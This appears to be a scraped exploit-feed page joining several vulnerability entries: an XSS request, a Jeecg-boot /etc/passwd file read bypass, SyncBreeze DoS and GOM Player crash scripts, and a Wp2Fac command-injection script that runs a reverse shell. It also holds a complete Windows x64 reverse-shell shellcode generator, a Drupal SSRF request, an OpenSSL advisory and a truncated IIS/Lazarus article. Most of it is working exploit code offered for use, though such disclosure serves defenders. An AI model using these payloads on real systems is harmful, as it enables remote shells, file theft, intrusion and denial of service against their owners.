The Microsoft Windows Kernel suffers from out-of-bounds reads due to an integer overflow in registry .LOG file parsing.

Microsoft Windows Kernel Integer Overflow / Out-Of-Bounds Read

Event Ticketing System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Event Ticketing System-1.0 XSS-Reflected - RCE## Author: nu11secur1ty## Date: 09/08/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `id` request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload }}uypja"><script>alert(1)</script>k36c0 was submitted inthe id parameter. This input was echoed asuypja"><script>alert(1)</script>k36c0 in the application's response.The attacker can use this vulnerability to trick the user intoexecuting - opening the browser on his machine and opening a hazardousURL address.STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1694154671_204/index.php?controller=pjFront&action=pjActionCheckout&locale=1&id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplmHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7Origin: http://demo.phpjabbers.comReferer: http://demo.phpjabbers.com/Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Ticketing-System-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/event-ticketing-system-10-xss-reflected.html)## Time spent:01:25:00

Event Ticketing System 1.0 Cross Site Scripting

Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.

In the /testConnection route, a MySQL connection can be constructed to cause arbitrary file reading.

@PostMapping({"/testConnection"})
    public Result a(@RequestBody JmreportDynamicDataSourceVo var1) {
        Connection var2 = null;
        String var3 = var1.toString();
        a.info(" local cache key: " + var3);
        Object var4 = this.localCache.a(var3);
        if (g.d(var4)) {
            int var5 = g.e(var4);
            a.info(" local cache value: " + var5);
            if (var5 >= 3) {
                return Result.error("数据源已连接错误3次以上,请检查配置信息！");
            }

            if (var5 == 0) {
                return Result.OK("数据库连接成功", true);
            }
        } else {
            this.localCache.a(var3, 0, 3600000L);
        }

        try {
            Result var6;
            try {
                String var37 = var1.getDbType();
                Result var40;
                if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
                    boolean var39 = this.jmreportNoSqlService.testConnection(var1);
                    if (var39) {
                        var40 = Result.OK("数据库连接成功", true);
                        return var40;
                    } else {
                        this.localCache.a(var3, 1);
                        var40 = Result.error("数据库连接失败：错误未知");
                        return var40;
                    }
                } else {
                    Class.forName(var1.getDbDriver());
                    DriverManager.setLoginTimeout(60);
                    String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
                    var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
                    if (var2 == null) {
                        this.localCache.a(var3, 1);
                        var40 = Result.OK("数据库连接失败：错误未知", true);
                        return var40;

There is protection during the parsing process.

    public static String g(String var0) {
        if (a(var0, "mysql")) {
            if (var0.indexOf("allowLoadLocalInfile") > 0) {
                var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
            } else {
                var0 = var0 + "&allowLoadLocalInfile=false";
            }
        }

we can bypass it

POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{
    "id":"1",
    "code":"select \* from information\_schema.tables",
    "dbType":"jndi",
    "dbDriver":"com.mysql.cj.jdbc.Driver",
    "dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
    "dbName":"information\_schema",
    "dbUsername":"fileread\_/etc/passwd",
    "dbPassword":"password",
    "connectionTimaes":"5"
}

CVE-2023-41578: Jeecg-boot <=3.5.3 Arbitrary File Read · Issue #1 · Snakinya/Bugs

SyncBreeze version 15.2.24 suffers from a denial of service vulnerability.

    # Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service# Date: 30/08/2023# Exploit Author: mohamed youssef# Vendor Homepage: https://www.syncbreeze.com/# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe# Version: 15.2.24# Tested on: windows 10 64-bitimport socketimport timepyload="username=admin&password="+'password='*500+""request=""request+="POST /login HTTP/1.1\r\n"request+="Host: 192.168.217.135\r\n"request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"request+="Accept-Language: en-US,en;q=0.5\r\n"request+="Accept-Encoding: gzip, deflate\r\n"request+="Content-Type: application/x-www-form-urlencoded\r\n"request+="Content-Length: "+str(len(pyload))+"\r\n"request+="Origin: http://192.168.217.135\r\n"request+="Connection: keep-alive\r\n"request+="Referer: http://192.168.217.135/login\r\n"request+="Upgrade-Insecure-Requests: 1\r\n"request+="\r\n"request+=pyloadprint (request)s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.217.135",80))s.send(request.encode())print (s.recv(1024))s.close()time.sleep(5)

SyncBreeze 15.2.24 Denial Of Service

GOM Player version 2.3.90.5360 suffers from a buffer overflow vulnerability.

    # Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 30.08.2023# Vendor Homepage: https://www.gomlab.com# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Tested Version: 2.3.90.5360 (latest)# Tested on: Windows 11 64bit# Thanks to: M. Akil GÜNDOĞAN#  - Open GOM Player#  - Click on the gear icon above to open settings#  - From the menu that appears, select Audio#  - Click on Equalizer#  - Click on the plus sign to go to the "Add EQ preset" screen#  - Copy the contents of exploit.txt and paste it into the preset name box, then click OK#  - Crashed!#!/usr/bin/pythonexploit = 'A' * 260try:    file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC is not created")

GOM Player 2.3.90.5360 Buffer Overflow

Drupal version 10.1.2 appears to suffer from web cache poisoning due to a server-side request forgery vulnerability.

    ## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction## Author: nu11secur1ty## Date: 08/30/2023## Vendor: https://www.drupal.org/## Software: https://www.drupal.org/download## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http## Description:It is possible to induce the application to perform server-side HTTPrequests to arbitrary domains.The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com wassubmitted in the HTTP Host header.The application performed an HTTP request to the specified domain. Forthe second test, the attacker stored a responseon the server with malicious content. This can be bad for a lot ofusers of this system if the attacker spreads a malicious URLand sends it by email etc. By using a redirect exploit.STATUS: HIGH-Vulnerability[+]Exploit:```GETGET /drupal/web/?psp4hw87ev=1 HTTP/1.1Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.comAccept-Encoding: gzip, deflate, psp4hw87evAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,text/psp4hw87evAccept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36 psp4hw87evConnection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Origin: https://psp4hw87ev.pwnedhost.com```[+]Response from Burpcollaborator server:```HTTPHTTP/1.1 200 OKServer: Burp Collaborator https://burpcollaborator.net/X-Collaborator-Version: 4Content-Type: text/htmlContent-Length: 62<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>```[+]Response from Attacker server```HTTP192.168.100.45 - - [30/Aug/2023 05:52:56] "GET/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)## Time spend:03:35:00

Drupal 10.1.2 Web Cache Poisoning

Wp2Fac version 1.0 suffers from an OS command injection vulnerability.

    # Exploit Title: Wp2Fac v1.0 - OS Command Injection# Date: 2023-08-27# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://github.com/metinyesil/wp2fac# Tested on: Kali Linux & Windows 11# CVE: N/Aimport requestsdef send_post_request(host, revshell):    url = f'http://{host}/send.php'    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)Gecko/20100101 Firefox/102.0',        'Accept': '*/*',        'Accept-Language': 'en-US,en;q=0.5',        'Accept-Encoding': 'gzip, deflate',        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',        'X-Requested-With': 'XMLHttpRequest',        'Origin': f'http://{host}',        'Connection': 'close',        'Referer': f'http://{host}/',    }    data = {        'numara': f'1234567890 & {revshell} &;'    }    response = requests.post(url, headers=headers, data=data)    return response.texthost = input("Target IP: ")revshell = input("Reverse Shell Command: ")print("Check your listener!")send_post_request(host, revshell)

Wp2Fac 1.0 Command Injection

476 bytes small Windows/x64 PIC null-free TCP reverse shell shellcode.

    import ctypes, structimport argparsefrom keystone import *# Exploit Title: Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)# Exploit Author: Senzee# Date: 08/29/2023# Platform: Windows X64# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763# Test IP: 192.168.1.45 # Test Port: 443# Payload size: 476 bytes# NUll-Free: True# Detailed information can be found at https://github.com/senzee1984/micr0_shell# Generated Shellcode (192.168.1.45:443):# Payload size: 476 bytes# buf =  b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x4c\x89\xcd\x41\xb8\x8e\x4e\x0e\xec\xe8\x8f\xff\xff"# buf += b"\xff\x49\x89\xc4\x48\x31\xc0\x66\xb8\x6c\x6c\x50\x48\xb8\x57\x53\x32\x5f\x33\x32"# buf += b"\x2e\x64\x50\x48\x89\xe1\x48\x83\xec\x20\x4c\x89\xe0\xff\xd0\x48\x83\xc4\x20\x49"# buf += b"\x89\xc6\x49\x89\xc1\x41\xb8\xcb\xed\xfc\x3b\x4c\x89\xcb\xe8\x55\xff\xff\xff\x48"# buf += b"\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec"# buf += b"\x30\xff\xd0\x48\x83\xc4\x30\x49\x89\xd9\x41\xb8\xd9\x09\xf5\xad\xe8\x2b\xff\xff"# buf += b"\xff\x48\x83\xec\x30\x48\x31\xc9\xb1\x02\x48\x31\xd2\xb2\x01\x4d\x31\xc0\x41\xb0"# buf += b"\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd0\x49\x89\xc4\x48"# buf += b"\x83\xc4\x30\x49\x89\xd9\x41\xb8\x0c\xba\x2d\xb3\xe8\xf3\xfe\xff\xff\x48\x83\xec"# buf += b"\x20\x4c\x89\xe1\x48\x31\xd2\xb2\x02\x48\x89\x14\x24\x48\x31\xd2\x66\xba\x01\xbb"# buf += b"\x48\x89\x54\x24\x02\xba\xc0\xa8\x01\x2d\x48\x89\x54\x24\x04\x48\x8d\x14\x24\x4d"# buf += b"\x31\xc0\x41\xb0\x16\x4d\x31\xc9\x48\x83\xec\x38\x4c\x89\x4c\x24\x20\x4c\x89\x4c"# buf += b"\x24\x28\x4c\x89\x4c\x24\x30\xff\xd0\x48\x83\xc4\x38\x49\x89\xe9\x41\xb8\x72\xfe"# buf += b"\xb3\x16\xe8\x99\xfe\xff\xff\x48\xba\x9c\x92\x9b\xd1\x9a\x87\x9a\xff\x48\xf7\xd2"# buf += b"\x52\x48\x89\xe2\x41\x54\x41\x54\x41\x54\x48\x31\xc9\x66\x51\x51\x51\xb1\xff\x66"# buf += b"\xff\xc1\x66\x51\x48\x31\xc9\x66\x51\x66\x51\x51\x51\x51\x51\x51\x51\xb1\x68\x51"# buf += b"\x48\x89\xe7\x48\x89\xe1\x48\x83\xe9\x20\x51\x57\x48\x31\xc9\x51\x51\x51\x48\xff"# buf += b"\xc1\x51\xfe\xc9\x51\x51\x51\x51\x49\x89\xc8\x49\x89\xc9\xff\xd0"def print_banner():  banner="""███╗░░░███╗██╗░█████╗░██████╗░░█████╗░  ░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░████╗░████║██║██╔══██╗██╔══██╗██╔══██╗  ██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░██╔████╔██║██║██║░░╚═╝██████╔╝██║░░██║  ╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░██║╚██╔╝██║██║██║░░██╗██╔══██╗██║░░██║  ░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░██║░╚═╝░██║██║╚█████╔╝██║░░██║╚█████╔╝  ██████╔╝██║░░██║███████╗███████╗███████╗╚═╝░░░░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░  ╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝"""  print(banner)  print("Author: Senzee")  print("Original Github Repository: https://github.com/senzee1984/micr0_shell")  print("Description: Dynamically generate PIC Null-Free Windows X64 TCP Reverse Shell Shellcode")  print("This version does not support shellcode execution")  print("Attention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\n\n")def get_port_argument(port):  port_hex_str = format(port, '04x')  port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]  if "00" in {port_part_1, port_part_2}:    port += 257    port_hex_str = format(port, '04x')    port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]    return f"mov dx, 0x{port_part_1 + port_part_2};\nsub dx, 0x101;"  return f"mov dx, 0x{port_part_1 + port_part_2};"def get_ip_argument(ip):  ip_hex_parts = [format(int(part), '02x') for part in ip.split('.')]  reversed_hex = ''.join(ip_hex_parts[::-1])  if "00" in ip_hex_parts and "ff" not in ip_hex_parts:    hex_int = int(reversed_hex, 16)    neg_hex = (0xFFFFFFFF + 1 - hex_int) & 0xFFFFFFFF    return f"mov edx, 0x{neg_hex:08x};\nneg rdx;"  return f"mov edx, 0x{reversed_hex};"def get_shell_type_argument(shell_type):  if shell_type == "cmd":    return f"mov rdx, 0xff9a879ad19b929c;\nnot rdx;"  return (f"sub rsp, 8;\nmov rdx, 0xffff9a879ad19393;\nnot rdx;\npush rdx;"            f"\nmov rdx, 0x6568737265776f70;")def output_shellcode(lan,encoding,var,save):  sh = b""  for e in encoding:        sh += struct.pack("B", e)  shellcode = bytearray(sh)  print("[+]Payload size: "+str(len(encoding))+" bytes\n")  counter=0  if lan=="python":    print("[+]Shellcode format for Python\n")    sc = ""    sc = var+" = b\""    for dec in encoding:          if counter % 20 == 0 and counter != 0:              sc += "\"\n"+var+"+="+"b\""          sc += "\\x{0:02x}".format(int(dec))          counter += 1    if count % 20 > 0:      sc += "\""      print(sc)    elif lan=="c":    print("[+]Shellcode format for C\n")    sc = "unsigned char " + var + "[]={\n"      for dec in encoding:          if counter % 20 == 0 and counter != 0:              sc += "\n"          sc += "0x{0:02x}".format(int(dec))+","          counter += 1    sc=sc[0:len(sc)-1]+"};"    print(sc)    elif lan=="powershell":    print("[+]Shellcode format for Powershell\n")    sc = "[Byte[]] $"+var+" = "      for dec in encoding:          sc += "0x{0:02x}".format(int(dec))+","    sc=sc[0:len(sc)-1]    print(sc)    elif lan=="csharp":    print("[+]Shellcode format for C#\n")    sc = "byte[] " + var + "= new byte["+str(len(encoding))+"] {\n"      for dec in encoding:          if counter % 20 == 0 and counter != 0:              sc += "\n"          sc += "0x{0:02x}".format(int(dec))+","          counter += 1    sc=sc[0:len(sc)-1]+"};"    print(sc)      else:    print("Unsupported language! Exiting...")    exit()  if save=="true":    try:      with open(output, 'wb') as f:        f.write(shellcode)        print("\n\nGenerated shellcode successfully saved in file "+output)    except Exception as e:      print(e)    if __name__ == "__main__":  print_banner()  parser = argparse.ArgumentParser(description='Dynamically generate Windows x64 reverse shell.')  parser.add_argument('--ip', '-i', required=True, dest='ip',help='The listening IP address, default value is 192.168.0.45')  parser.add_argument('--port', '-p', required=False, default=443, dest='port',help='The local listening port, default value is 443')  parser.add_argument('--language', '-l', required=False, default='python', dest='lan',help='The language of desired shellcode runner, default language is python. Support c, csharp, python, powershell')  parser.add_argument('--variable', '-v', required=False, default='buf', dest='var',help='The variable name of shellcode array, default variable is buf')  parser.add_argument('--type', '-t', required=False, default='cmd', dest='shell_type',help='The shell type, Powershell or Cmd, default shell is cmd')  parser.add_argument('--save', '-s', required=False, default='False', dest='save',help='Whether to save the generated shellcode to a bin file, True/False')  parser.add_argument('--output', '-o', required=False, default='', dest='output',help='If choose to save the shellcode to file, the desired location.')  args = parser.parse_args()  ip=args.ip  port=int(args.port)  lan=args.lan.lower()  var=args.var  shell_type=args.shell_type.lower()  save=args.save.lower()  output=args.output  print("[+]Shellcode Settings:")  print("******** IP Address: "+ip)  print("******** Listening Port: "+str(port))  print("******** Language of desired shellcode runner: "+lan)  print("******** Shellcode array variable name: "+var)  print("******** Shell: "+shell_type)  print("******** Save Shellcode to file: "+save+"\n\n")  args = parser.parse_args()  port_argument = get_port_argument(port)  ip_argument = get_ip_argument(ip)  shell_type = get_shell_type_argument(shell_type)  CODE = ("find_kernel32:"" xor rdx, rdx;"" mov rax, gs:[rdx+0x60];"        # RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address" mov rsi,[rax+0x18];"        # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure" mov rsi,[rsi + 0x30];"        # RSI is the address of the InInitializationOrderModuleList member in the _PEB_LDR_DATA structure" mov r9, [rsi];"        # Current module is python.exe" mov r9, [r9];"        # Current module is ntdll.dll" mov r9, [r9+0x10];"        # Current module is kernel32.dll" jmp jump_section;""parse_module:"        # Parsing DLL file in memory" mov ecx, dword ptr [r9 + 0x3c];"        # R9 stores the base address of the module, get the NT header offset" xor r15, r15;"" mov r15b, 0x88;"  # Offset to Export Directory   " add r15, r9;"" add r15, rcx;"" mov r15d, dword ptr [r15];"        # Get the RVA of the export directory" add r15, r9;"        # R14 stores  the VMA of the export directory" mov ecx, dword ptr [r15 + 0x18];"        # ECX stores the number of function names as an index value" mov r14d, dword ptr [r15 + 0x20];"        # Get the RVA of ENPT" add r14, r9;"        # R14 stores  the VMA of ENPT"search_function:"        # Search for a given function" jrcxz not_found;"        # If RCX is 0, the given function is not found" dec ecx;"        # Decrease index by 1" xor rsi, rsi;"" mov esi, [r14 + rcx*4];"        # RVA of function name string" add rsi, r9;"        # RSI points to function name string"function_hashing:"        # Hash function name function" xor rax, rax;"" xor rdx, rdx;"" cld;"        # Clear DF flag"iteration:"        # Iterate over each byte" lodsb;"        # Copy the next byte of RSI to Al" test al, al;"        # If reaching the end of the string" jz compare_hash;"        # Compare hash" ror edx, 0x0d;"        # Part of hash algorithm" add edx, eax;"        # Part of hash algorithm" jmp iteration;"        # Next byte"compare_hash:"        # Compare hash" cmp edx, r8d;"" jnz search_function;"        # If not equal, search the previous function (index decreases)" mov r10d, [r15 + 0x24];"        # Ordinal table RVA" add r10, r9;"        # Ordinal table VMA" movzx ecx, word ptr [r10 + 2*rcx];"        # Ordinal value -1" mov r11d, [r15 + 0x1c];"        # RVA of EAT" add r11, r9;"        # VMA of EAT" mov eax, [r11 + 4*rcx];"        # RAX stores RVA of the function" add rax, r9;"        # RAX stores  VMA of the function" ret;""not_found:"" ret;""jump_section:"        # Achieve PIC and elminiate 0x00 byte" mov rbp, r9;"        # RBP stores base address of Kernel32.dll" mov r8d, 0xec0e4e8e;"        # LoadLibraryA Hash" call parse_module;"        # Search LoadLibraryA's address" mov r12, rax;"        # R12 stores the address of LoadLibraryA function"load_module:"" xor rax, rax;"" mov ax, 0x6c6c;"        # Save the string "ll" to RAX" push rax;"        # Push the string to the stack" mov rax, 0x642E32335F325357;"        # Save the string "WS2_32.D" to RAX" push rax;"        # Push the string to the stack" mov rcx, rsp;"        # RCX points to the "WS2_32.dll" string" sub rsp, 0x20;"        # Function prologue" mov rax, r12;"        # RAX stores address of LoadLibraryA function" call rax;"        # LoadLibraryA("ws2_32.dll")" add rsp, 0x20;"        # Function epilogue" mov r14, rax;"        # R14 stores the base address of ws2_32.dll"call_wsastartup:"" mov r9, rax;"        # R9 stores the base address of ws2_32.dll" mov r8d, 0x3bfcedcb;"        # Hash of WSAStartup" mov rbx, r9;"        # Save the base address of ws2_32.dll to RBX for later use" call parse_module;"        # Search for and get the address of WSAStartup" xor rcx, rcx;"" mov cx, 0x198;"" sub rsp, rcx;"        # Reserve enough space for the lpWSDATA structure" lea rdx, [rsp];"        # Assign the address of lpWSAData to the RDX register as the 2nd parameter" mov cx, 0x202;"        # Assign 0x202 to wVersionRequired and store it in RCX as the 1st parameter" sub rsp, 0x30;"        # Function prologue" call rax;"        # Call WSAStartup" add rsp, 0x30;"        # Function epilogue"call_wsasocket:"" mov r9, rbx;"" mov r8d, 0xadf509d9;"        # Hash of WSASocketA function" call parse_module;"        # Get the address of WSASocketA function" sub rsp, 0x30;"        # Function prologue" xor rcx, rcx;"" mov cl, 2;"        # AF is 2 as the 1st parameter" xor rdx, rdx;"" mov dl, 1;"        # Type is 1 as the 2nd parameter" xor r8, r8;"" mov r8b, 6;"        # Protocol is 6 as the 3rd parameter" xor r9, r9;"        # lpProtocolInfo is 0 as the 4th parameter" mov [rsp+0x20], r9;"        # g is 0 as the 5th parameter, stored on the stack" mov [rsp+0x28], r9;"        # dwFlags is 0 as the 6th parameter, stored on the stack" call rax;"        # Call WSASocketA function" mov r12, rax;"        # Save the returned socket type return value in R12 to prevent data loss in RAX" add rsp, 0x30;"        # Function epilogue"call_wsaconnect:"" mov r9, rbx;"" mov r8d, 0xb32dba0c;"        # Hash of WSAConnect" call parse_module;"        # Get the address of WSAConnect" sub rsp, 0x20;"        # Allocate enough space for the socketaddr structure" mov rcx, r12;"        # Pass the socket descriptor returned by WSASocketA to RCX as the 1st parameter" xor rdx, rdx;"" mov dl, 2;"        # Set sin_family to AF_INET (=2)" mov [rsp], rdx;"        # Store the socketaddr structure" xor rdx, rdx;"f"{port_argument}"  # Set local port dynamically" mov [rsp+2], rdx;"        # Pass the port value to the corresponding position in the socketaddr structuref"{ip_argument}"" mov [rsp+4], rdx;"        # Pass IP to the corresponding position in the socketaddr structure# " xor r8, r8;"      # " mov [rsp+8], r8;"        # Set zero for sin_zero. Comment these 2 lines to save more bytes, does not prevent the shellcode from working" lea rdx, [rsp];"        # Pointer to the socketaddr structure as the 2nd parameter" xor r8, r8;"" mov r8b, 0x16;"        # Set namelen member to 0x16" xor r9, r9;"        # lpCallerData is 0 as the 4th parameter" sub rsp, 0x38;"        # Function prologue" mov [rsp+0x20], r9;"        # lpCalleeData is 0 as the 5th parameter" mov [rsp+0x28], r9;"        # lpSQOS is 0 as the 6th parameter" mov [rsp+0x30], r9;"        # lpGQOS is 0 as the 7th parameter" call rax;"        # Call WSAConnect" add rsp, 0x38;"        # Function epilogue"call_createprocess:"" mov r9, rbp;"        # R9 stores the base address of Kernel32.dll" mov r8d, 0x16b3fe72;"        # Hash of CreateProcessA" call parse_module;"        # Get the address of CreateProcessAf"{shell_type}"" push rdx;"   " mov rdx, rsp;"        # Pointer to "cmd.exe" is stored in the RCX register" push r12;"        # The member STDERROR is the return value of WSASocketA" push r12;"        # The member STDOUTPUT is the return value of WSASocketA" push r12;"        # The member STDINPUT is the return value of WSASocketA" xor rcx, rcx;"" push cx;"        # Pad with 0x00 before pushing the dwFlags member, only the total size matters" push rcx;"" push rcx;"" mov cl, 0xff;"" inc cx;"        # 0xff+1=0x100" push cx;"        # dwFlags=0x100" xor rcx, rcx;"" push cx;"        # Pad with 0 before pushing the cb member, only the total size matters" push cx;"" push rcx;"" push rcx;"" push rcx;"" push rcx;"" push rcx;"" push rcx;"" mov cl, 0x68;"" push rcx;"        # cb=0x68" mov rdi, rsp;"        # Pointer to STARTINFOA structure" mov rcx, rsp;"" sub rcx, 0x20;"        # Reserve enough space for the ProcessInformation structure" push rcx;"        # Address of the ProcessInformation structure as the 10th parameter" push rdi;"        # Address of the STARTINFOA structure as the 9th parameter" xor rcx, rcx;"" push rcx;"        # Value of lpCurrentDirectory is 0 as the 8th parameter" push rcx;"        # lpEnvironment=0 as the 7th argument" push rcx;"        # dwCreationFlags=0 as the 6th argument" inc rcx;"" push rcx;"        # Value of bInheritHandles is 1 as the 5th parameter" dec cl;"" push rcx;"        # Reserve space for the function return area (4th parameter)" push rcx;"        # Reserve space for the function return area (3rd parameter)" push rcx;"        # Reserve space for the function return area (2nd parameter)" push rcx;"        # Reserve space for the function return area (1st parameter)" mov r8, rcx;"        # lpProcessAttributes value is 0 as the 3rd parameter" mov r9, rcx;"        # lpThreatAttributes value is 0 as the 4th parameter" call rax;"        # Call CreateProcessA)  ks = Ks(KS_ARCH_X86, KS_MODE_64)  encoding, count = ks.asm(CODE)  output_shellcode(lan,encoding,var,save)

Windows/x64 PIC Null-Free TCP Reverse Shell Shellcode

Issue summary: The POLY1305 MAC (message authentication code) implementation
contains a bug that might corrupt the internal state of applications on the
Windows 64 platform when running on newer X86_64 processors supporting the
AVX512-IFMA instructions.

Impact summary: If in an application that uses the OpenSSL library an attacker
can influence whether the POLY1305 MAC algorithm is used, the application
state might be corrupted with various application dependent consequences.

The POLY1305 MAC (message authentication code) implementation in OpenSSL does
not save the contents of non-volatile XMM registers on Windows 64 platform
when calculating the MAC of data larger than 64 bytes. Before returning to
the caller all the XMM registers are set to zero rather than restoring their
previous content. The vulnerable code is used only on newer x86_64 processors
supporting the AVX512-IFMA instructions.

The consequences of this kind of internal application state corruption can
be various - from no consequences, if the calling application does not
depend on the contents of non-volatile XMM registers at all, to the worst
consequences, where the attacker could get complete control of the application
process. However given the contents of the registers are just zeroized so
the attacker cannot put arbitrary values inside, the most likely consequence,
if any, would be an incorrect result of some application dependent
calculations or a crash leading to a denial of service.

The POLY1305 MAC algorithm is most frequently used as part of the
CHACHA20-POLY1305 AEAD (authenticated encryption with associated data)
algorithm. The most common usage of this AEAD cipher is with TLS protocol
versions 1.2 and 1.3 and a malicious client can influence whether this AEAD
cipher is used by the server. This implies that server applications using
OpenSSL can be potentially impacted. However we are currently not aware of
any concrete application that would be affected by this issue therefore we
consider this a Low severity security issue.

As a workaround the AVX512-IFMA instructions support can be disabled at
runtime by setting the environment variable OPENSSL_ia32cap:

   OPENSSL_ia32cap=:~0x200000

The FIPS provider is not affected by this issue.

CVE-2023-4807

Microsoft Internet Information Services (IIS) is a web server software package designed for Windows Server. Organizations commonly use Microsoft IIS servers to host websites, files, and other content on the web. Threat actors increasingly target these Internet-facing resources as low-hanging fruit for finding and exploiting vulnerabilities that facilitate access to IT environments. 
Recently, a

Microsoft Internet Information Services (IIS) is a web server software package designed for Windows Server. Organizations commonly use Microsoft IIS servers to host websites, files, and other content on the web. Threat actors increasingly target these Internet-facing resources as low-hanging fruit for finding and exploiting vulnerabilities that facilitate access to IT environments.

Recently, a slew of activity by the advanced persistent threat (APT) group Lazarus has focused on finding vulnerable Microsoft IIS servers and infecting them with malware or using them to distribute malicious code. This article describes the details of the malware attacks and offers actionable suggestions for protecting Microsoft IIS servers against them.

**An Overview on Microsoft IIS Servers**

IIS was first introduced with Windows NT 3.51 as an optional package back in 1995. Since then, it has seen several iterations, improvements, and features added to align with the evolving Internet, including support for HTTPS (secure HTTP) requests. In addition to being a web server and serving HTTP and HTTPS requests, Microsoft IIS also comes with an FTP server for file transfers and an SMTP server for email services.

